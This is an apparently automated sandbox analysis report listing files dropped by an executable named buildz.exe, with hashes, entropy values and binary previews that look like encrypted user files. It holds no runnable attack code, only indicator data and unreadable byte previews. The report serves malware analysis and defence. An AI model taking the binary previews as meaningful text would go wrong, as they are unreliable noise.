                        Preview:/*! FQY.n_...=....v../.P'....l.U..v.8..`I.zpz......<.c......1.X:...;.cq(.>.R.<#S.."B.......Ks.....%w....>..Vo.j(...>....`4..iO,.|....R....5...W..\:+..V.Pz.9..m^......])......`.;...%/...=..{.S|$t......<.}>...m..y....+]#..F.i.>h...U.....B.:-L.-K.s..9.|...g....-..{8.z...B..hB.TF#.p....DD.......F.u\w.=...E.rU:.G$.K..b..;....u.x.T....Y.@.I..!..XG.^9...%VH<....Z.R.%8.-...RJ..9.Y.$p[g......A)....~.2."p...V.-).L..c...g.XR.$J..T.a}....t..(...B....9...S>...._y'..e.?.4.Rw....w.H.5l6h......U..9..e.e.g.e.n~..7-h0X.l..;.w0?U}{.J,C.j..A.Ju.#...>.'N....{.........s^..j.:...y...5.F&c..6.F.9.V.^.a..$Y......u.8.Q..$.h.X...p...@..c.1.WG...a^&Q.D!..{.>..U.21..........-.......9"W...uD.fi<..........3.r...s...%.SIu....)N...=..V..........z.f..........y.;6...~..\...b.3...f...F.v..s..B..)....l.~\W;....U.v ......BKpy.......I.g....f..H...c..L1....D.BL.FBh.g4Sgu......ga}....c....E...#.!.*.F.Y.....~.....*f...`2........R.5..f.EI{.]...O#p..%j.;.y8U..Xv.X)._...AE.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):400
                        Entropy (8bit):7.36855431626896
                        Encrypted:false
                        SSDEEP:12:lN1BGYJ0kztUxp5T6RpWQuXq426Gcii9a:rGKzI6SQu6qGbD
                        MD5:C8ED0D3063CE4D01B9D068B2A58B6337
                        SHA1:E35EC41D44009C67315F74DCF468DF497471C1D2
                        SHA-256:B49D00C9DF7CA7C47938134F1A9C8F00514680A4888ABB863ECB225D6252B3D0
                        SHA-512:60C06D85F1845E629C28FF073FEF5AF3115994FC7DBB00A4DCD5CC427728353791BD5DE414095078E4D2AF6396FF8659C470A759D30AAE8DD28776865D11D776
                        Malicious:false
                        Preview:1.312....P1m/k.%.%.\...[.~6.rdf..1...Wy(P...bly...X)8cFg5x.N.I+@..D......-g..~.;aJ.w]v".'..M!.y.Q..`M........?...$.]W1vf.p~.../*.#......Q..!.:e.o.....2V).'v#Z....V...N`...J...y....k...+......),.A..........R......B...T..u...za.SB./.a....ZK^.XmW..0...x..M....83.u.tU+@.".).:Lrxr..F..Pg9[=|.wDo.\....)...alQ..P.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):481
                        Entropy (8bit):7.444622328643748
                        Encrypted:false
                        SSDEEP:12:MPDAZ2ollp0tO/QzDJhDlsSN7zFJHs63uLQDLX26Gcii9a:MP62oCEQfJhDlsS9FJFSGGbD
                        MD5:19415CFF9E99ADC47C19FB94D4A49891
                        SHA1:F718A068F1B756A27EBF22361B349E5DF2E253E5
                        SHA-256:A18C5CCE4F9E1353F133767D85ED9622171283A1C7D8BE1B550C070D89384396
                        SHA-512:99E4FA00815FA2B65F71BC4419CD823BF9601F15F73599634ED79E0B86524656F6CED9CFA1693F4D2AC6DFD22CC4384147B119EEBCF81780540BBD59A6750A44
                        Malicious:false
                        Preview:.{.w....?......q...N.....m-.'.X1.Ya....I.l.R...]..0..XKL.........0...C....a.-.d..Oq`.x...7V5.8..Q(...#.@.;.....u....[D..._G..R...YR?..... #;=...K...z. ...!.q....,...z4:s.z'.$....GWa...c.W.ED.l..H~.tM...........C...SHTXl0.l.....t..r.V.....ai.7.4ey..G53N....%11.Q7..L.U._G......6.&.z.sr>.#..CX."...l...f.e.i..N...+......9+.a..?.F).......6RF..5.It.{..2...#..,6>1..7`......e.....8c..-i.....SEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):988649
                        Entropy (8bit):6.387520826884084
                        Encrypted:false
                        SSDEEP:12288:LvHCrmX2fHq+rX7LTPnzgY6E6GlsV7nNy9xX1cdKXxLMl:L6qmS+jLPzBllsVpy9xXmyLG
                        MD5:E268B3227F648CE12A216C25FFB62200
                        SHA1:EECC1140343547171BCACE050DC2BD03FAB2AB68
                        SHA-256:9C4E8DE6846FECB6CA43F051EFB9345F2C0FDE7DE7F8583BC329CD11C6C5A993
                        SHA-512:248E1E64BDF3CE135A195E28C0E3149F0EBF52729F05BFC15E0C8F3A3B3665681627C3BFDF5071957417393269CAD30F8DA2038E8FC28F3C036CE73879CDDD3B
                        Malicious:false
                        Preview:/*! F.....wv..=Z:.t.%....|[...3*...V......g.....Z....h6..aU,.....i....Z.).~.....4..h.....k#..<..l..!..?K..=...&...xo....(..&<*|.!Q.C.... ..2......q.)C.o... ...z...z..'~.=P....obH.F.M.2....<)I..._..m.Q..T...d^.7.Y.%Ih+`euy_Bu..5.CIr...i=./4#..!........~tC........."o.\..kc..e+s.L..R...u.....c..,l...."' .........ut...L..>.H.h.'..t.....^4.qx'6.."1.x......X3..5.;....x..F.:........v..a/....<....A&_.#.....B....9._..Y~...!bj?r.M.-.p....;]....)D..#.'......7_..65J-......Z....LtK...M.=...n..)..d.9'..A..2..YZ......}..l..6.7..?A2..4.....6.....N...#n..=KK}.2..l.jd..h.bV...U(TX.......C.B.ZZ.aF...4F(6K.@{k%=.L...b......(.$..!...7..O...+.E.F..D.t.U.M...,...~5c....(Q.....'/...q...uSsm...D,`..'.3bV_W....,I.........8B..L......".8.u...b^.p..b.....,C...//.g.T+J.d*.....s.q.^af.i&.. #..?...||C7..&@.q..ii.u.E.u........"...R.....p....R....Q.....B.`x{el.a6J*W.J.O..9tbw..+.3..K...N.#q..O../^...#...R.......[.. ......].LY(..^.......I.nsi...<..wG.%s.J U......?..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1679
                        Entropy (8bit):7.869077042533216
                        Encrypted:false
                        SSDEEP:24:VJR+o8GPt94geoMMoT6F7b/NQhm1TxBpZSbBoEPwK3+0vBZH3X9XkrGUafuMLCtz:3xPz/MMoYpwCTVEZOInVBxu/tbGM6UD
                        MD5:DBD18FF846407B555F432578B6823EED
                        SHA1:89FC10FDA7D7B83156E645D01F271344CFBCDFE9
                        SHA-256:6558441C65B21600783A557FA862002A4A4F9548F06E603C10C69A68ECDC7EEA
                        SHA-512:C326B20CF6C85C7CAE0C20B4C1FA298915FCAD6361B587DC77AA3532836F5636D95DC8413F175518884E552DD010C613C31B7F831503EC530AE1A2A80B473EF9
                        Malicious:false
                        Preview:<html.>..m...D.\.O{.gu..].........,mJ...].a.^.....)....u+S.&..p7..2.6:..}.L..8..B.t......&'~....1....].......'.....zI......+bv8...T.jP.^N'....g.c..@..>._....^F...4......$.....N.......s.J......P_.Ek..6."|E....PG...'.....|...]...............Mu...'..T.s..,.a......_*.OB....1 (....8F.....fG....)W.^.J.R..<..X..6..-.A...T....i..L.../.lyj.....B..te..*.z..J-6.l,..0YLXW-.....vv.&5y...m...W-..FY..........k.y.U.........(.S.X...,.u.d....D/.y.!e.|w_UB&V..{e:*...U{.B,.....obH".+..V......t.l.~.o<...L...A.......57.T...S.G,....Yd...a..u...O.s.....8...4...........JNs{..$h...8.....>..Mh.!%o/..i..v3%+...R.3.;S.t..;o..-r._.%%...$c..?c.:......Z...Y.....FZd..j.k..K04.B.c}.f....x......}..'....9...!...;u.....;E..~.Y2.....f.V.@[*,....F...!5.D2% .J....T.8......9.H.l...^pK..<...?.N...v'WO.R...f..o.q.u`j6....!Qh.a...........A<..F2..p.....Nw...@.3.....r..y.h..s..{._`....!.|.....<X......_.}<...)>./K....u...*|?!.M...w....'...g..1?b'D......k.V...^.m...$..0.K.l
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5653603
                        Entropy (8bit):5.667294259848313
                        Encrypted:false
                        SSDEEP:49152:1EMp4xtbEaX37/ORDsYon+shfiAm+1GbMnkI/Lp1m5aUIzyI3rm6pIepx4srkiMt:yPpGbMnkJ5XmIqsTv7
                        MD5:388752E98FAF039570A8BDDF145E8E9E
                        SHA1:24F775FF15D2301F06332ACFA09BCF9F3679DDF2
                        SHA-256:1025190B9EB776D65FE41B0B55ACE6A4A86E4883A83817F8354B866DD99A8447
                        SHA-512:07EA0F0FDACD45FDD7143557927135B546764EF18AB13A6284560406BADF4FC75BCC3C6ADF691E07152B0827A4B51867119DB5FE7306637F1F63F88D6D1155DF
                        Malicious:false
                        Preview:/*! F....M.xD`..G?.9-.Ud..)...gH...1??..U.....B"i....H.dO.V..t..z4\..=huT.^........../....C..(s.q..*.R.O.<M..)W...I.6.B..`.-.`...#...6M..u$[uk.^...`.....:..G.F9e...../g.m....|:3...."......A..c..LxPgP..)0....y......\..^LGn.....W...=1.@....G...6...........`V.v%r9....QO..M.,3..t...q.(..(.*....g...EO.x."e3k..b.E%^../...|.Sa.........+...B.....X.s.|..>K.u5o..%v.Z......."8.B...."......d.J..Y..B.R..Q..L..Q,...R..M......:..7X2JF..b./..v..Y.2F.R..1..).d.."|...sw.'._.b........v'.d......%...@....o......u[.hY..Z..r..P.f.z...=o.i..ME.k..J...Ie.....w..M.,....pes.rm....,].].G.....!.y.P...".V&...97.N!9T..(.B=[..kFJ.?...A...MH/.2...'1..X..+.. dM.Q.....%7cf.......e..c\.G.-.2;....D)......*P.H..}e.....2....M..'-N....G._c.{].?....-...U.<!.gr..y<.!.L'..~.D...,O=2..D.~sA...[.,...(.M}M..%..q.p{.."..V....H.......X..N.....DpSe..qI..N.t..C.>...fA;....s..6....`...D;.4...H.l.a.Z!E...3.D._2..W.:...J..-.4..E'm.p.n.vU.7.:..>..).IR4)G^....d...4...X3).$..-.,.mBZ.[..'.......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1473
                        Entropy (8bit):7.862080963445069
                        Encrypted:false
                        SSDEEP:24:CtQZ9Q8mU1pmxs02bAInRvnW1jURVmM7BCR2p4pVbh0LuVVhm4GbD:Gu+U1kWAInRvW1jURHBCR2p4/uuJm4UD
                        MD5:C228CC0494D5BE8530EE4B0EDF457EA0
                        SHA1:59267CDA4E89E3E4CC7436FC214583164A821ED8
                        SHA-256:C674BBA862D3B6782E4DEF8227B768CF316C2A13870479FD331FD327395B91D4
                        SHA-512:7B399B47A73185C15147E73D62E5CDC6E21410B24470C65E7875DE16C966CCFAC2B52EB309609E57CAC6FF6B41615B69EBA42F95B677CA82C095394680B0C166
                        Malicious:false
                        Preview:<html{.5...]6....4../t.Q.........=....f....#I.|...c..K...87....l;................6.....26......n...D;Q......>.J..(x;.n.Bi..(......E.....p.....2....t^NJ#..8..#...d........z{.s....7b.N.j./.D...{...4..CE."*r"..:..%.xI..,....z.y2.m..=....>.&....g..`......Y.(I^I.a*....(....\.#x.-'.q.[.....?u=..-f.v.Z0...0.....|....G.K..~D.U.."d....u..r..!..,O..;&....4..e..G..`J@.....D.>..x... ...x0.I.I...hG./...2..(Z1y.=.*]=4n..}.9f..e..G2..#....+:_.>.. **....+dx..\.(5.&..9V..\.,.....]qA..=..C}.....@...!....S#Ed.G..D,wj.Ebu`I.mw......4....3)Co.1X.;..4..z...:.4c..B><..2J"......._5-...[....n2D...p.......(.n....`...V.k..].....W.{......@......p..(4-.+...h*'.D.G.*QO..P.bXs:I..-.....S.>'_PG..}.o,fF...Be..Q..0.d..3r(.K...C...FZ.....e.....@B.*=uM.z;[.0...I..P...9nz......m............0..h...(...o...[..0...m..^2.e..=d...c..b..j.F@k..H.UI!R..P..TE.^..1.N.2.'x2.i..&...>.%......z......F..7..............p..a.G....|J...|.o....5u.~.]..&n..F........^.%...(p../...H.s..~..J
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12270
                        Entropy (8bit):7.983844829565122
                        Encrypted:false
                        SSDEEP:192:sFiFEqfkW+KXQytmKLZr8egbLhSkHACJaW7WewbSubUqsSJ1KvjOojZ/5JBA:yzqfwKX7bGVSkHvJaiW5bSuCQKvjZjZm
                        MD5:82AFADD9171FE9B381B21A420C640455
                        SHA1:91E6C97F178AD45F02F6EC26E5A46D527773C650
                        SHA-256:BFF8C2AA7747EDA5C63D488F06E5671BECE7B4D93389B36648328A769C471D55
                        SHA-512:9412BB0F982D223B8152A088AF974146B1340AAF59D539CB65EB5FED0E1D62B359DF2A671BEE87315227EACDC50C15D8D6E045020C8B95D87DD8A2E967BEEEA7
                        Malicious:false
                        Preview:(()=>....eFg.l.h..f......u.....,3......4.......P#6..-....twz..@.&.....K6.y.h..x .E........gB..2.I..H.e..N..+.c.....d..l0~......@(..+Z...@.1....l.DK..7]....F.A.....A..L(.3..]{.d.x....[....,...;..B........o...f..y(..k#.....".mg.......W.|.Fo#.......2..R.....^8A.."......A...u x....y.....}.{8.........<....4S.xw.A!......O.....N.......o&=."oX.~....W.L.Z.]?...R.X..v.M....f...W.....x%.....~T....b......V....g.(....fr`...7.....]8...y^...R#....[..Z...j.*MD..|.K{.^O.p.l......*.UB...j..v..L.T.@j...1.V........#.1`..^..L.Yb.ZB....w.......(h......9l.dn.D.....Y:....iT4..........<....`~..~.3T...^LZF...P.......Y..`......?.ruZh~r..)...]H.v.\..B.O....?a.g&....A...K..7?..[....v.#.1dT..gt..S.....x..F...sk`fc&z@.L..G..... ,..[....'..P.Y.h.RYW....S.e.vSBFK.J.........V.U.5._.M)M...lv.Y.).....H...3..NS.E... &...g.H.Q}.5=.n..Vo.gH._........].Y.h-#...cC"...1/6....!..t.~.N..i>6.z.p..9..(@Y..-.j-..W.|O.87L..y..5O.H...i.Nl..W..AZ......S..{,..v''F/....T.y....o}....`..Uw.A.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358109
                        Entropy (8bit):7.386424586984845
                        Encrypted:false
                        SSDEEP:6144:5Fn3lDRO2M827XQMudNhVFTw22k0SrqwOqtFS4pc8Yv7fX7cxbAB0uO:jn18tTudNFTw2LtXsHIzF
                        MD5:4B4F8135CF6A80E266BC76DB71AE5E46
                        SHA1:32F5F1FB004B6C5B0A621C31AFABC40E9C54DC87
                        SHA-256:346A7D253DC0DBF7F73613446C97122319173F84EC372BD8B06DAC9DB27D6090
                        SHA-512:DA4CF0692C7E62DD2F8D193B750D5A79ACE3632A54481E9C37556BD850E61852E4C54D6A3F91F60B11D458C6677188EEB4123EE13EE68D7A66AD00F3D32AF545
                        Malicious:false
                        Preview:!funcy....d...s'Z~.J.).......).T..V..'........gsG......x..E..X..Z....J......%..3.:UZ#G8H...D.1...z.B......3K'...'>:^.....x........`.....z..).N...D...GG...3{.0..FBk.........6......!.a..Q`.u.b"..Ce.X.F....zC.l...W.A....J.`.. ..*.........}I#.o..L..EA...H.e[.-.6#V.w....%.=.s.e.)yv.....LZ.^....e=.E.l..N.|..Q9...TS..y:......+..8o..+.._.U.`.7..]4r#Z6&.@.T..;.G..K.c..0l..e.X.E...:....Z......A...8g...!o...v....8+....~.[...@.....t9.a...1>..>..,`O.J......@<...g...~Z]\.kn ..J....j.>..}..{.j.."SY.. ...*.1}n.|...o..RsO.Of[.._....d......:.....8.....Vf:#..A.>5{.....0.%.}?..)......P.m.7I....I.Q.[0.q.........XRR..0.........Y...,......A.pA......Oj.7(..^....?VQ..a.E..z.u.L..!*.&Z...k.-K.M'j...b..Y..B5.[..(Q.....4..Z.........%......ck.W....v.-l..).. .f..T[..P.....yuI1...r.$..../.....3+bU\..{.N.F........c.$..8.....e..{s...d.^..+,q......{.........!...Ob...gW7..U........3..:J..7.C...Q..I....J.....z.%...`.{b...q.....tyF.e?.ae~.E6?.O...<..-.~%J...\..V..G.T..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4605
                        Entropy (8bit):7.96028846766539
                        Encrypted:false
                        SSDEEP:96:IKgBp2NXW/U6gs83AOENF5niFG0ohIP4EutWfcVFuz63Wy9xPrIU0PB+4A:CT2NXW/UYFnjhIQEjEnu3y9xPrYg4A
                        MD5:6E9EFECA1C1686B08E92A13A1E6AED6A
                        SHA1:858BE0DC4EFF5E7BCDE35E180F344E6D309B9636
                        SHA-256:5517B78B1603AFEA4DB993AD26A2F61A8A1D409B86DA21D792F8084DFEA94B3C
                        SHA-512:450D36CA6158BC293CFA9F4B1ADF53D184F21CB0626395A0BE1FE917CE847851FD6A491306024248E7E538CACBAE8D7070F056CF0DFA2BB234796DBEC24227D3
                        Malicious:false
                        Preview:(()=>.......kd......J~....L..g...n%..4/..z....D.[.x.I_...M..........}h..=.S9.u.. b..Mz....T...~uBf&.L..E.%.U.....cM.Z...[7..4S..."B....._..Z.`3a^-.C.ErI.%.3.6.C. h.R.5..e.k..U.......ef.D..a8eF..*)Qt.),....Y.0..DA...h..O.....G?.(!.%..l.D.C+.z.......9..n>.kb.l.4.....=.......^.....U..~_2.s....C[s..v.......$........3.....Q..N...Q.2e....j@....<=.;..n...T.NbSM...b...`Q].71.....M.. J1../QP...,...&....".F.<........`.T.v.lod.C..1.....M.!{-.......z.....zc....Oj.$....U..<.|(F..u.....8.m......Y.o|..%6f..G.C|7.....]5....[#W....C]..^..[El$;....ctNK..|..^./2.?*.4J;*..M..._.......*b......%.Ktv.....6....KA...D..G.#t...Oq.T.[....R.t3...m.,.tj.s..D{.&....]5.[.+.^y6.W.......@L...8.P.qC.....~.T..a..%.....3V....`.;3.....j....9J]`/......`x.'.zf`\L..}..#.r.P..\....9...Y..`..#...k.>....k.)m..i...J...6?......soT.......ZVX.......}7....g..n....o\...7t.....^8...Af.....1..*.5\2...z@...,..v.:#..= `...>3.Wz..B..$.SF.2..~..].......B...{.{...(...].L.2.V(b....Y.yC\ZP
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1197
                        Entropy (8bit):7.817036888853538
                        Encrypted:false
                        SSDEEP:24:9I0Srednd9sUGNHQxQILXUCckUyR1rpTca4sjmqgN+lqfRpn66GbD:5ndKNHQL7UPyR1rp0sjmpfRzUD
                        MD5:4C932090375D8A711D268C9801D37E93
                        SHA1:EB5E599110A9B6886580AAF3153CA05183EAD1B8
                        SHA-256:F4CA4F52F0FBB9B571DEF5684D5594139D96C5CC683AAA6339E02134259475C6
                        SHA-512:BDE6990B3C8AB646BB60B73946ED9F103E570AFE9402F147A140BCE606FFD65AA32E2AACE36A703E1BFEDD634AEE8465C0686732FACC297F3CB97683CED6FCD5
                        Malicious:false
                        Preview:(()=>.....irCz3..R.k......N..=z....E+.XH..a..i.,...\...h...!q*...7..1. ..G.m9.%..d._....~.y.f.4.UP.a....l.9........K.!al..o...kVV.......K..a.*.f..p..T...oV(.`.'@.....T....1#!..1`..b...._e...:.....B.....<.!"N..m'.....^*.uX%..3..B$V..."(.cE.....l....*.....u.s..../...-.E4.*.....+USi.?.\+....#~.JO.....S.V.......%B...&..S.|....7....?.8..U:.J...9.jQ$1..l......\ptWZ.......P.+I7k..N.lK...9ZQ.....<....E.U.4..Si......2q.Fv0.3|..x Z.......=I.i.1....Y.U..9...W...wS.E|...s7.\Cp.....-.t.u..~k1T...........J./t....M.E...4}wO.G3.)WjP#@....csz.....\....e..#......CV%.$a.:.u...l....6BI....*,..?..>%9($./S.,W.%o<.r......e.......7q.%..0...im...]...)].f.V..."..R..Y.. 'o....F.>.p.e.C....1.<..>.~.L.+Rd...,3J.V.jM....`?\E.X...&......S.9P.]..9..#.........V..7.j.|.....)......f....x..?.....<!..W`.L..).'.w.I..=w4......<.....8?zU.s..U..5XKr...._x.c..d..;!f">.a...%.v~V....7.[l..l.9.T|3<5W/n...:...I..I...dO..".4K.(=F....?.3......M..4..9O....d.>.{z-........c.s]..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5656
                        Entropy (8bit):7.967006822360954
                        Encrypted:false
                        SSDEEP:96:pHT2vq1ea1pmWM6U2kmrwgg3gPmjntdH0vpgHGv96l7vDTBybFy9RvuA:pHbdpmuU2qh3g+jntdH0vpoGq7vDN99N
                        MD5:F9CACB521856C0071D8CD31193A47674
                        SHA1:4CC405FAC3BBC371CE5C119363ABA9D11563052B
                        SHA-256:6069390422BABAFA3367D87BC9B5B80C0ED9529EF994EBB3E57DFCE18F6A49BF
                        SHA-512:4A40520414FB64DE20A97915FF2283F9932015B6507B44D7705FFAD3EAD62218013A1D48677E548BD87E60D08F3DE9DD0DEDA90BB49A31117702FEDFF38F6381
                        Malicious:false
                        Preview:(()=>.....{b.?..6....$~....)..y..=..P....sL......S.n.....I.g...C..<l...... O..!Dl.x....n9....s..V#..z.0.z..IV6i6q\.%1.s.(u....q.E.......-...z=...e.g._.35.....r.~c.J.OV ..5.2.\~..31...mU..L.....>V.....O1.J.m%VP4.;..!.....;.!N.Z.u..)*P...5...R.$.;.9........e.k....L..s@/..s.....U}e....J.fim.r.1...1I.x......%% ....=...f.m{........c.@..6v.%E.-.55.Kf....\1j...`].2....|k.1.%.].....=.Z7\..G.$7..bc.....<..........|nC..j.D...F..uX..).p...%W..-)....k...).X#&.#.8...b:..<...0..'.>2.!}.=..;4..1....r.=pi..}......pVf..Tz........6A.....%.....A.t...S.;.r;9.......#/...ON.L.o...<.E...q2+(..0NV.T......Qd.|..Ko..)...b.R.63.I.!o..&...2....3n............D......<....73'.7B.}..<Th.O....C........z......T.?A...).S*9zK.a%\.I..../l.\S4....rx.......8N.>r.S...C.cpe4...U...L.B...&..B.......G..a]sPX.q...vc.... ..i..G.1rG.....8..9~.7.BA...,......._..........kn.......+kG..;.>P-....$z1g..L.u:,..h...I..b..a....4..y Th[.3.g..s2..+.)EwJ.>h.....b.....+.....b.J#5c
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):400
                        Entropy (8bit):7.328821667832484
                        Encrypted:false
                        SSDEEP:12:7F0huNJP7MebTmxUWnLs1WmNkG26Gcii9a:7FaqFdbTgUsLUWOGbD
                        MD5:C3D369400A1D8CE6BCA944B584AB6708
                        SHA1:D3B87A2B549C93B2580D4877FB76280E75EE1038
                        SHA-256:80A01472BAD743EBFE344FE82A72BA9B1513A42BF2800AA53A418CF8A5424523
                        SHA-512:F3792A436A38786FDFECF1701F5FD6AA98A2D60EC35E575D92407D1CE236ADEB313AE6B4FF94ED9F4039090DE3F44620DF44828624031983EDA4B842D132DBC4
                        Malicious:false
                        Preview:1.DD9.+.X"'C.>.H....'m..H....[~......97.....w......!,.....2......XoV*.#..9_..'N./^.D7].|...Qtx>..T....s..., ...W..'.)-.!.....b....z./.....|...i..Cw.(.{.Cd..g.`...%V.L.d...g.RCQB....|RK.{.YWU..O..w.F..Z4...'.....6.......@...@.7...d..s.+.......O$4..n......xguP./.{...e8`...n..b..J.c...bw}.RHT.f......pv.VWvF.&.).EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):469
                        Entropy (8bit):7.4606946672178855
                        Encrypted:false
                        SSDEEP:12:MKRdW/AvuUFDBZKXF9qqM8Nx6I26Gcii9a:M0W/2uURKXF0Mx6aGbD
                        MD5:648F3A1CCA667EAA7AF6BDB401E5FA48
                        SHA1:FE87B4AEE51B9E1171F4A71112B71FF05464D7C2
                        SHA-256:3E32F15026D3CF27A5D85E9877C361FA74AD0C043A67DA504BE4A493045B2F83
                        SHA-512:80063A362525D56008FF311D647B79BA5EF5390516259295289ECBCB4348B5E7CA8048BC1F6648C83BAC994AB9FE8C15423A85B41DF2D3CC872DF2D3EABC4D05
                        Malicious:false
                        Preview:.{......*._......J..%.Vx...X.k...n....{.9...:..g......Y.V."9....v.f_...$...0\.0Tn.s.x%..D..qV..x....%.!...8.D....E.URw.u9..t.C.|-X.:....Q} .0...e.^~..j..?.(..H;$+.t..p..,0K).J...=,(t.8.F.L(.{.m..Y.8.B..-!V...m@. ".J+.../pT..."@...("~.Sm'..-..iVf.....Q..........D..9.@x..&..O`;m..]? +..e......g.T..i.>FV.:0.....v.S.x9.].D.o..5...?DP.8.b.....{DQ.g\.......n...PEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2741
                        Entropy (8bit):7.933790027829362
                        Encrypted:false
                        SSDEEP:48:KoMMhMiHATKgwrvBhoGEFYkqNbzyX/NDph6J/uR8iIIHGr1nBUD:KNi3gwbBDyqpzCNDp8M3hm5nBA
                        MD5:17724D1982B5FC04DEF9E32F88D0A3F2
                        SHA1:5D2BDA507FD6EA69A21A75CC552503D3CB9E0BC5
                        SHA-256:9F9F0AAA0A35E735585C4E4E6E23AB1ADE0AA703729D9ABD3E2131FCF0961DD8
                        SHA-512:FB1D656873D3F41A8B8ACACC8A08B5E74E244C340557BF3735F3410EBE6C6D21B9A8251C665813F1A86E7D2CD57DFAF488F51F274C2AF5C9520F945A2D071450
                        Malicious:false
                        Preview:/**. .cD...8.|;...`.H(I8..]A.....9..../.....2..... ./.gw...9........C.M.+............M.k.ln.LE...8.q..v....%4[_..N...........D..\'.Vg.oT.S..$..a..wrg..XLV...SH..iQ+.K.k...Uq..j...h65...>.b3xJ.rc~.:=.z.`..d..hI^..Z......K.h......5.z..p..?g.4..(...mI.....HB.'.n..5.$k.*.....I.......ME......7AA...!.w....'"=..I....C..<......o..^..g-..m.>....L.>[..yv.<...s{...Vit........C...r..a".d.8......0=...[P....CrP...w.....{...*/(....S..#.f*..2...]TM.......K....;^:J...k7.;.....:.......70`...|{F\L.j~....l..J.......K'qC*]q9sd...S/d7.......$.......}.....` ..A3..1~...+B.G..)~gG.o2..."..y..P.(.,*..U}v>.....heWs..$|....I2....]...]c.Kj..>.....2.q.}z.....d..m]..]C%Ri....q../_...N.....+..j.I.*..nYy....]........h[.F.;.f.D...C~E`!.`.,@......9.X.../.fNG.qH....j.....:.M...!..4u.*$..1.......{.ER.J.@..G.Q..2..%\..E....T.bZ.._W..eB.7,.w.tK&M..7X4~......7K ..BX.[....G.2.X[P.h........t...6K..6.k...m.WGk.p.!..)...b.F.!.qp.pB..j.hl........o]....Me&...)..^5..........O..0
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):6185
                        Entropy (8bit):7.970422056942681
                        Encrypted:false
                        SSDEEP:96:ETgF1WH1yuEudmLLRZKrSLF3ZQRpXytZE8VqGNLVt36LvxwnoRWjCT4gnrSxVwA:aK14jdOLHKeJQbQBlt6pwjCTXnrSxVwA
                        MD5:D51791CAE6FC42604C7140C1644E6F86
                        SHA1:97D963422E8D1ACFC1801BE6BE1A366D25733F29
                        SHA-256:CF1A03AF8625174D563D4D5F5BFB0004EB579744FA644297AB309BFFDC6C4F0F
                        SHA-512:3EE2B05C679FEDEC7D78B6ABC25D75C661F31610C577F024EF3C4700B91F01D37BCE48FBBDEA8FE5166D6389C7CCC0E150023252CE7DB31218C399D7F11D73D9
                        Malicious:false
                        Preview:/**. m.....B...|..n..Y...<.@.'HA.a.ury[(I..uM.".nN.;:o.....y...(..L{B.n.|..^.*.o....@.8...x..![Z.p|..Yp.h)V.d?.wF....i7.&..y.j0.q.P... ...M..mT.V..`t...P..Q.b........;.....@..k..f|gS>&:+..!z=..:.3.......C.Wq......c.S..p,Q<...k<L......#.d.RM..#1..pJ2.....,...F.(.K.....^..+..-...._.&../.A...a..*....U....(BM.~...R...cUz/.....S..A....*.h.Sw.....$*. ..... ..zyO...g.e.XT..DT...!uZ...>.P.......K;[.3t..,d7..&..<.......By........?..K.W.*.W....G..1.0...>.LJD.~!......8{].F../(..1...........Q.....^.9...D.........~.."J..Rj..E|k......=...p..?B..^.04.K...I...F.\....+...w"...S.k.Ot.~N..x...I.yc.k...#.u?...`.._.?hr.,(.....,...q.F.......v>e...P.*.......#s.p..h....C....,..}.K...1..v.B.?G..J.X.I.8.'..lg.}i~.9UM.h..3......_1...c......\.12%.>..i......V8.5......%2.-Y!....j.!..;..&a.[i5..M-B..l}..x..6..^D-R.%y|C8\.gKE.R...g..2].BXx`.Vo.TFV.........$..Kn....E...%,1..u.....;....\....0."~...5o.........?.P...g.u.....TJ.0....~...n...8.p&..|K...3..6..L0k.W.)W..*...D(....2./;
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):540
                        Entropy (8bit):7.536130854193736
                        Encrypted:false
                        SSDEEP:12:jkTWCcUVYSjaCs8A3GAy199SfOzGzTFmzWVT5YNznmkzOqx26Gcii9a:YFccYS+75GAyH9Smq3FmSzYNDlOUGbD
                        MD5:7BD3071EB983D392DB186C206FF0B618
                        SHA1:5C85610A4B5E404126FC34F9839FE2661417D562
                        SHA-256:AFAAB3F70FC4B88CEF18BE5156EC0225E143390BAB71A3A00B716A46FA673F06
                        SHA-512:8E7C2019EF1CD7DA94986377DC4FE739850FD3406E77F5424758EFCFBC7A5BF2625E01B4B1988CE3559E06230A727DC70CD56445F4B2B4784CF8667BDD3D72B7
                        Malicious:false
